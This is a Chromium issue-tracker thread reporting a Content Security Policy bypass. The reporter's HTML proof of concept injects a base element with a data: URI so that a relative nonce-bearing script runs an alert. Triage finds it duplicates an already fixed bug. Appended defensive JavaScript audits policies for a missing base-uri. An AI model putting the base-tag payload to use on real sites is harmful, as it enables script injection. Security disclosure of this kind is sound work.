Security: Content Security Policy (CSP) Bypass with using base element
Reported by
chromium...@gmail.com,
Aug 2 2017
Issue description

VERSION
Chrome Version: 60.0.3112.72 stable
Operating System: iOS, Android

PoC: https://jsbin.com/yadunevade

<html>
<head>
<body>
<base href=data:/,-alert(1)/>
<script src="./lib/jquery.js" nonce=random-secret></script>
</body>
</html>

You will see an alert box.
,
Aug 2 2017
The Proof-of-Concept seems to be identical to crbug.com/679318, the fix for which landed in 58.0.3008.0. I was not able to reproduce any problem here on either Windows or Android. On iOS, this is out of Chrome's hands as the CSP implementation is provided by WebKit. Can you please add screenshots of the repro process on Android?
,
Aug 2 2017
Oops! I forgot to try this on the latest version of stable on Android. Sorry.
,
Aug 2 2017
Thank you for providing more feedback. Adding requester "elawrence@chromium.org" to the cc list and removing "Needs-Feedback" label. For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
,
Aug 2 2017
Thanks for letting me know. If you see something surprising, please do reopen.
,
Nov 9 2017
This bug has been closed for more than 14 weeks. Removing security view restrictions. For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
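Added example, not part of the original report or of Chromium's code: the PoC depends on an injected base element changing where a relative, nonce-carrying script URL resolves, so a site using nonces can audit its own policy for the CSP base-uri directive, which restricts what a base element may point to. The function names parseCsp and auditBaseUri and the sample policies are constructed for illustration.

```javascript
// Audit a Content-Security-Policy header value for the <base> risk in this issue:
// a nonce-based script policy with no (or a permissive) base-uri directive.
function parseCsp(header) {
  const directives = new Map();
  for (const part of header.split(';')) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length === 0) continue;
    const name = tokens[0].toLowerCase();
    // A repeated directive is ignored by the browser; the first one wins.
    if (!directives.has(name)) directives.set(name, tokens.slice(1));
  }
  return directives;
}

function auditBaseUri(header) {
  const csp = parseCsp(header);
  const findings = [];
  // script-src falls back to default-src; base-uri has no fallback at all.
  const scriptSrc = csp.get('script-src') || csp.get('default-src') || [];
  const usesNonce = scriptSrc.some((s) => /^'nonce-[^']+'$/i.test(s));
  if (!usesNonce) return findings; // this check only concerns nonce-based policies
  const baseUri = csp.get('base-uri');
  if (baseUri === undefined) {
    findings.push('missing-base-uri');
    return findings;
  }
  for (const src of baseUri) {
    const s = src.toLowerCase();
    if (s === "'none'" || s === "'self'") continue;
    // Wildcards and bare schemes (data:, https:, ...) let injected markup choose the base.
    if (s === '*' || /^[a-z][a-z0-9+.-]*:$/.test(s)) {
      findings.push(`permissive-base-uri: ${src}`);
    }
  }
  return findings;
}

// Constructed sample policies, not taken from any real site.
const samples = [
  "script-src 'nonce-abc123'",
  "script-src 'nonce-abc123'; base-uri 'none'",
  "default-src 'self' 'nonce-r4nd0m'; base-uri data: 'self'",
];
for (const policy of samples) {
  console.log(JSON.stringify(policy), '->', auditBaseUri(policy));
}
```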
Comment 1 by chromium...@gmail.com
, Aug 2 2017